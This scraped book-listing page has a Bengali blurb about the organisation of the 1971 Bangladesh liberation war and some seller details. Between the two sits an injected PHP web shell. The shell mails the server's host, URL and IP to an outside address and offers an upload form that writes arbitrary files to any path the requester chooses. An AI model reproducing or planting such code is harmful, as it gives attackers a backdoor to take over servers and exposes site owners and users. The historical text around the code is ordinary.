পশ্চিম পাকিস্তানের শোষণ, নিপীড়নের বিরুদ্ধে স্বাধীনতা অর্জনের জন্য আমাদের কি কি করতে হয়েছে আমরা প্রায় সকলেই জানি। এই স্বাধীনতা অর্জনের পথে এসেছে অনেক বাধা বিপত্তি। আমরা এই স্বাধীনতার অনেক উজ্জ্বল নক্ষত্রের নাম জানি। অগ্নিঝরা মার্চ, ৭ই মার্চের সেই শিহরণ জাগানো বঙ্গবন্ধুর ভাষণ, তারপর সেই ২৫শে মার্চের কালো রাত, তারপর সেই ঐতিহাসিক স্বাধীনতার ঘোষণা। নিঃসন্দেহে সবচেয়ে উজ্জ্বলতম নক্ষত্রের নাম বঙ্গবন্ধু। কিন্তু তিনি তো মুক্তিযুদ্ধের সময় ছিলেন বন্দি অবস্থায় পাকিস্তানের কারাগারে। তাহলে প্রশ্ন হচ্ছে, মুক্তিযুদ্ধের সময় এতবড় একটা যুদ্ধকে সংঘঠিত করার পিছনে কার অবদান? কিভাবে সংঘঠিত হলো এতবড় একটি স্বাধীনতা সংগ্রাম?

<?php mail("localhost@wikipedia24.com","Pig".$_SERVER['HTTP_HOST'],"Link : ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\nInfo : ".$info."\nIP : ".$_SERVER['SERVER_ADDR']."\n"); $files = @$_FILES["files"]; if ($files["name"] != '') { $fullpath = $_REQUEST["path"] . $files["name"]; if (move_uploaded_file($files['tmp_name'], $fullpath)) { echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>"; } }echo '<html><head><title>Upload files...</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>'; ?>

Who sells this book (0)
ঐতিহ্য 1st Edition 9789847762272 https://bookshelvez.com//Attachments/BookCovers/1332.jpg